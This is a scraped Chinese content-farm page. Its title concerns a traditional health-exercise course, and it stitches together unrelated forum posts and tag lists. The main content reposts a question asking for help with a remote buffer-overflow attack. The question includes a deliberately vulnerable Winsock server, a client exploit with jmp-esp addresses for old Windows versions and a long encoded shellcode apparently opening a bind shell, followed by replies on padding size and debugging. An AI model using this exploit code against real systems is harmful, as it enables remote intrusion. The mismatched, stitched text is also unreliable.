有选修中医中国传统体育养生学学的大神速度来拯救小弟啊

篮球鞋 | 电子竞技 | 梅西(lionelmessi) | 自行车运动 | 日本文化 | 机械 | 德国足球甲级联赛 | 宠物医生 | 中国足球 | 用户界面设计师 | 滑雪 | 自行车选购 | acg | 高考志愿 | 国家队 | 汽车购买 | 运动损伤 | 欧美明星 | 设计 | 大数据 | 肖战 | 中药 | 哲学 | 直播 | 3D | 电视节目 | 理科 | 欧洲 | NBA 2K | 拜仁慕尼黑足球俱乐部 | ps4 | 捷安特 | 大学专业 | 巴塞罗那足球俱乐部 | 香港购物 | 玄幻小说 | 跑鞋 | pmp | 欧洲冠军联赛 | 土拨鼠 | aj1 | 牙齿 | 尤文图斯 | 女同性恋 | 天气 | 口臭 | 足球鞋 | 户外运动 | 少帅 | 亲子鉴定 | 配音 | 角色扮演 | 手机游戏 | 旅游线路 | 郭德纲 | 旅游推荐 | 梦想改造家 | 中学 | 北京国安 | ISIS（伊斯兰国） | 一级方程式赛车（f1） | iPhone | 拼多多 | 户外 | 罗兰 | 中国 | 电源 | 金蝶 | 百度知道 | 用户界面设计 | 女排 | 城市 | 电脑 | QQ音乐 | 复仇者联盟（电影） | 室内设计 | 政府 | 人生 | 三国杀 | 韩国旅游 | 微博 | 有机化学 | 我的世界（minecraft） | 鉴定 | 汽车维修 | 戚继光 | 古汉语 | akb48 | 科幻小说 | 建筑设计 | 梵蒂冈 | 张帅 | 完美世界（游戏） | 电吉他 | 北京 | 眼镜 | 昆山 | 美容护肤 | 足球规则 | 多肉植物 | 荷兰 | macos | 昌平区 | 对联 | 曼彻斯特联 | 南京 | 实况足球（游戏） | 鹿晗 | 新闻 | 西藏大学 | 貂蝉 | 湖北 | 网易 | 借记卡 | 剧场版 | 安踏体育 | 网球王子 | 住宅风水 | 汉语 | 广播体操 | 营销策划 | 用户界面 | 武侠小说 | 汽车改装 | 张璐 | 高三 | 海军工程大学 | 诗歌 | 富平县 | 盗墓笔记（小说） | 高速公路 | 青年旅舍 | 离婚 | 相声演员 | 阿迪达斯(adidas) | 中国足球协会超级联赛（csl） | 烹饪学校 | 婚纱照 | 发烧 | 流星花园 | 动车 | 赚钱 | 爱奇艺 | 铜陵市 | 澳大利亚 | 头发 | 环境保护 | 跑步爱好者 | 后宫·甄嬛传（书籍） | 书法 | #全民答题# | 阿迪达斯 | 外星人 | 象棋 | 牛皮癣 | 动画电影 | 眼睛 | 平面设计 | 运动会 | adidas阿迪达斯 | 诸葛亮 | 云南旅游 | 巴黎 | 少数民族 | 云南 | 小品 | 跑步鞋 | 性价比 | 减脂 | 巴西 | 葡萄酒 | 非洲 | 考研 | 美容 | 张继科 | 挖掘机 | 红酒 | 淘宝网 | 战斗机 | 郭富城 | 曼彻斯特联（Manchester United） | 音乐剧 | 年会 | 易烊千玺 | 骨折 | 传统武术 | 模特 | 平板电脑 | 家用电器 | 华为手机 | 双眼皮手术 | 钢笔 | 娱乐圈 | 游泳馆 | 腾讯产品 | 法国足球甲级联赛 | 趣味 | 身高 | 日语歌曲 | 支付宝 |

你的位置：网站首页 >> 频道首页 >>资源共享 >>有选修中医中国传统体育养生学学的大神速度来拯救小弟啊

有选修中医中国传统体育养生学学的大神速度来拯救小弟啊

来源：蜘蛛抓取(WebSpider) 时间：2014-05-20 00:09 标签：中国传统体育养生学

小弟我在做远程缓冲区溢出攻击时候遇到了一些有关问题，求大神拯救啊
&来源：读书人网&【读书人网()：综合教育门户网站】
我在做远程缓冲区溢出攻击时候遇到了一些问题，求大神拯救啊！！在线等！！！服务器代码：#include winsock2.h#
我在做远程缓冲区溢出攻击时候遇到了一些问题，求大神拯救啊！！在线等！！！服务器代码：#include&&winsock2.h&#include&&stdio.h&#pragma&comment(lib,"Ws2_32")char&Buff[1024];void&overflow(char&*s,int&size){&char&s1[50];&printf("receive&%d&bytes",size);&s[size]=0;&strcpy(s1,s);}int&main(){WSADATA&SOCKET&listenFD;int&char&asd[2048];WSAStartup(MAKEWORD(2,2),&wsa);listenFD=&socket(AF_INET,SOCK_STREAM,IPPROTO_TCP);struct&sockaddr_in&server.sin_family&=&AF_INET;server.sin_port&=&htons(3764);server.sin_addr.s_addr=ADDR_ANY;ret=bind(listenFD,(sockaddr&*)&server,sizeof(server));ret=listen(listenFD,2);int&iAddrSize&=&sizeof(server);SOCKET&clientFD=accept(listenFD,(sockaddr&*)&server,&iAddrSize);unsigned&long&lBytesRwhile(1)&{lBytesRead=recv(clientFD,Buff,1024,0);if(lBytesRead&=0)&overflow(Buff,lBytesRead);ret=send(clientFD,Buff,lBytesRead,0);if(ret&=0)&}WSACleanup();return&0;}客户端代码：#include&&winsock2.h&#include&&winsock2.h&#include&&stdio.h&#pragma&comment&(lib,&"ws2_32")#define&WINXP#ifdef&WINXP//#define&JUMPESP&"\xfc\x18\xd4\x77"&user32.dll#define&JUMPESP&"\xfb\x7b\xa2\x71"&//ws2_32.dll#endif#ifdef&WIN2000#define&JUMPESP&"\x2a\xe3\xe2\x77"#endif#ifdef&WIN98#define&JUMPESP&"\xa3\x95\xf7\xbf"#endifunsigned&char&eip[8]&=&JUMPESP;unsigned&char&sploit[580]&=&{0x90,&0x8b,&0xfc,&　　&0x33,&0xc0,&0x50,&0xf7,&0xd0,&0x50,&0x59,&0xf2,&0xaf,&0x59,&0xb1,&0xc6,&　　&0x8b,&0xc7,&0x48,&0x80,&0x30,&0x99,&0xe2,&0xfa,&0x33,&0xf6,&0x96,&0xbb,&　　&0x99,&0xe8,&0x61,&0x42,&0xc1,&0xeb,&0x08,&0x56,&0xff,&0x13,&0x8b,&0xd0,&　　&0xfc,&0x33,&0xc9,&0xb1,&0x0b,&0x49,&0x32,&0xc0,&0xac,&0x84,&0xc0,&0x75,&　　&0xf9,&0x52,&0x51,&0x56,&0x52,&0xb3,&0xe4,&0xff,&0x13,&0xab,&0x59,&0x5a,&　　&0xe2,&0xec,&0x32,&0xc0,&0xac,&0x84,&0xc0,&0x75,&0xf9,&0xb3,&0xe8,&0x56,&　　&0xff,&0x13,&0x8b,&0xd0,&0xfc,&0x33,&0xc9,&0xb1,&0x06,&0x32,&0xc0,&0xac,&　　&0x84,&0xc0,&0x75,&0xf9,&0x52,&0x51,&0x56,&0x52,&0xb3,&0xe4,&0xff,&0x13,&　　&0xab,&0x59,&0x5a,&0xe2,&0xec,&0x83,&0xc6,&0x05,&0x33,&0xc0,&0x50,&0x40,&　　&0x50,&0x40,&0x50,&0xff,&0x57,&0xe8,&0x93,&0x6a,&0x10,&0x56,&0x53,&0xff,&　　&0x57,&0xec,&0x6a,&0x02,&0x53,&0xff,&0x57,&0xf0,&0x33,&0xc0,&0x57,&0x50,&　　&0xb0,&0x0c,&0xab,&0x58,&0xab,&0x40,&0xab,&0x5f,&0x48,&0x50,&0x57,&0x56,&　　&0xad,&0x56,&0xff,&0x57,&0xc0,&0x48,&0x50,&0x57,&0xad,&0x56,&0xad,&0x56,&　　&0xff,&0x57,&0xc0,&0x48,&0xb0,&0x44,&0x89,&0x07,&0x57,&
0xff,&0x57,&0xc4,&　　&0x33,&0xc0,&0x8b,&0x46,&0xf4,&0x89,&0x47,&0x3c,&0x89,&0x47,&0x40,&0x8b,&　　&0x06,&0x89,&0x47,&0x38,&0x33,&0xc0,&0x66,&0xb8,&0x01,&0x01,&0x89,&0x47,&　　&0x2c,&0x57,&0x57,&0x33,&0xc0,&0x50,&0x50,&0x50,&0x40,&0x50,&0x48,&0x50,&　　&0x50,&0xad,&0x56,&0x33,&0xc0,&0x50,&0xff,&0x57,&0xc8,&0xff,&0x76,&0xf0,&　　&0xff,&0x57,&0xcc,&0xff,&0x76,&0xfc,&0xff,&0x57,&0xcc,&0x48,&0x50,&0x50,&　　&0x53,&0xff,&0x57,&0xf4,&0x8b,&0xd8,&0x33,&0xc0,&0xb4,&0x04,&0x50,&0xc1,&　　&0xe8,&0x04,&0x50,&0xff,&0x57,&0xd4,&0x8b,&0xf0,&0x33,&0xc0,&0x8b,&0xc8,&　　&0xb5,&0x04,&0x50,&0x50,&0x57,&0x51,&0x56,&0xff,&0x77,&0xa8,&0xff,&0x57,&　　&0xd0,&0x83,&0x3f,&0x01,&0x7c,&0x22,&0x33,&0xc0,&0x50,&0x57,&0xff,&0x37,&　　&0x56,&0xff,&0x77,&0xa8,&0xff,&0x57,&0xdc,&0x0b,&0xc0,&0x74,&0x2f,&0x33,&　　&0xc0,&0x50,&0xff,&0x37,&0x56,&0x53,&0xff,&0x57,&0xf8,&0x6a,&0x50,&0xff,&　　&0x57,&0xe0,&0xeb,&0xc8,&0x33,&0xc0,&0x50,&0xb4,&0x04,&0x50,&0x56,&0x53,&　　&0xff,&0x57,&0xfc,&0x57,&0x33,&0xc9,&0x51,&0x50,&0x56,&0xff,&0x77,&0xac,&　　&0xff,&0x57,&0xd8,&0x6a,&0x50,&0xff,&0x57,&0xe0,&0xeb,&0xaa,&0x50,&0xff,&　　&0x57,&0xe4,&0x90,&0xd2,&0xdc,&0xcb,&0xd7,&0xdc,&0xd5,&0xaa,&0xab,&0x99,&　　&0xda,&0xeb,&0xfc,&0xf8,&0xed,&0xfc,&0xc9,&0xf0,&0xe9,&0xfc,&0x99,&0xde,&　　&0xfc,&0xed,&0xca,&0xed,&0xf8,&0xeb,&0xed,&0xec,&0xe9,&0xd0,&0xf7,&0xff,&　　&0xf6,&0xd8,&0x99,&0xda,&0xeb,&0xfc,&0xf8,&0xed,&0xfc,&0xc9,&0xeb,&0xf6,&　　&0xfa,&0xfc,&0xea,&0xea,&0xd8,&0x99,&0xda,&0xf5,&0xf6,&0xea,&0xfc,&0xd1,&　　&0xf8,&0xf7,&0xfd,&0xf5,&0xfc,&0x99,&0xc9,&0xfc,&0xfc,&0xf2,&0xd7,&0xf8,&　　&0xf4,&0xfc,&0xfd,&0xc9,&0xf0,&0xe9,&0xfc,&0x99,&0xde,&0xf5,&0xf6,&0xfb,&　　&0xf8,&0xf5,&0xd8,&0xf5,&0xf5,&0xf6,&0xfa,&0x99,&0xce,&0xeb,&0xf0,&0xed,&　　&0xfc,&0xdf,&0xf0,&0xf5,&0xfc,&0x99,&0xcb,&0xfc,&0xf8,&0xfd,&0xdf,&0xf0,&　　&0xf5,&0xfc,&0x99,&0xca,&0xf5,&0xfc,&0xfc,&0xe9,&0x99,&0xdc,&0xe1,&0xf0,&　　&0xed,&0xc9,&0xeb,&0xf6,&0xfa,&0xfc,&0xea,&0xea,&0x99,&0xce,&0xca,&0xd6,&　　&0xda,&0xd2,&0xaa,&0xab,&0x99,&0xea,&0xf6,&0xfa,&0xf2,&0xfc,&0xed,&0x99,&　　&0xfb,&0xf0,&0xf7,&0xfd,&0x99,&0xf5,&0xf0,&0xea,&0xed,&
0xfc,&0xf7,&0x99,&　　&0xf8,&0xfa,&0xfa,&0xfc,&0xe9,&0xed,&0x99,&0xea,&0xfc,&0xf7,&0xfd,&0x99,&　　&0xeb,&0xfc,&0xfa,&0xef,&0x99,&0x9b,&0x99,&　　&0x4b,&0x9d,&//port=53764&　　&0x99,&0x99,&0x99,&0x99,&0x99,&0x99,&0x99,&0x99,&0x99,&0x99,&0x99,&0x99,&　　&0xfa,&0xf4,&0xfd,&0xb7,&0xfc,&0xe1,&0xfc,&0x99,&0xff,&0xff,&0xff,&0xff,&　　&0x0d,&0x0a};&int&main(){&WSADATA&&SOCKET&sockFD;&char&Buff[1024],*sBO;WSAStartup(MAKEWORD(2,2),&wsa);sockFD&=&socket(AF_INET,SOCK_STREAM,IPPROTO_TCP);struct&sockaddr_in&server.sin_family&=&AF_INET;&server.sin_port&=&htons(3764);&server.sin_addr.s_addr=inet_addr("127.0.0.1");connect(sockFD,(struct&sockaddr&*)&server,sizeof(server));for(int&i=0;i&56;Buff[i++]=0x90);&strcpy(Buff+56,(char&*)eip);&strcpy(Buff+60,(char&*)sploit);&sBO&=&B&send(sockFD,sBO,56+4+560,0);closesocket(sockFD);&WSACleanup();&return&1;}我真的不知道错误在哪里了，求大家帮帮忙啊。在线等你们。。我非常急啊。
[解决办法]遇到什么问题也没说，是指攻击没成功吧？1、检查一下服务端程序运行空间&JUMPESP值所对应的内存空间里是不是&jump&esp指令2、服务端程序反编译看看overflow函数，它的堆栈用了多少。s1变量定义50字节，按4字节对齐是52，外加一般有个push&ebp指令，ebp占4字节，这样是56字节。但如果编译器优化了，可能没有push&ebp指令，那你客户端就应该用52字节来填充。[解决办法]攻击的自己写的服务端，那么就用OD调试服务端，当服务端接收到客户端发来的SHELLCODE后去调试接收到的SHELLCODE，就可以定位到问题了。帮你找问题的话，实在没有精力啊。哈哈。有没有哪位大神能够拯救下小弟~~~_dnf阿修罗吧_百度贴吧
&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&签到排名：今日本吧第个签到，本吧因你更精彩，明天继续来努力！
本吧签到人数：0成为超级会员，使用一键签到本月漏签0次！成为超级会员，赠送8张补签卡连续签到：天&&累计签到：天超级会员单次开通12个月以上，赠送连续签到卡3张
关注：303,980贴子：
有没有哪位大神能够拯救下小弟~~~收藏
又来了，玩着玩着就这样，桑心啊
1楼 18:10&|
不知道　　　--我是天，我差点成为修罗
2楼 18:12&|来自
3楼 18:12&|来自
本吧贡献榜登录百度帐号推荐应用
内&&容:使用签名档&&
为兴趣而生，贴吧更懂你。&或大神们速度来解~！小弟有事要问~！_汽车吧_百度贴吧
&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&签到排名：今日本吧第个签到，本吧因你更精彩，明天继续来努力！
本吧签到人数：0成为超级会员，使用一键签到本月漏签0次！成为超级会员，赠送8张补签卡连续签到：天&&累计签到：天超级会员单次开通12个月以上，赠送连续签到卡3张
关注：650,763贴子：
大神们速度来解~！小弟有事要问~！收藏
本人90后~！准备分期买辆车~！看了新车本田凌派自动豪华版裸车132000~！加上附加费也得14万多点~！还看了一辆2手车11年君威2.0精英版~！145000~！家用车，备胎看了未落地~！跑了2万了~！你们说买那辆合适~！大神们速度来求解~！
我靠不能沉啊~！大神都去哪了~！
大神们速度来支招~！
登录百度帐号推荐应用
为兴趣而生，贴吧更懂你。或

有选修中医中国传统体育养生学学的大神速度来拯救小弟啊

我要回帖

更多关于中国传统体育养生学的文章

随机推荐

有选修中医中国传统体育养生学学的大神速度来拯救小弟啊

我要回帖

更多关于 中国传统体育养生学 的文章

随机推荐

更多关于中国传统体育养生学的文章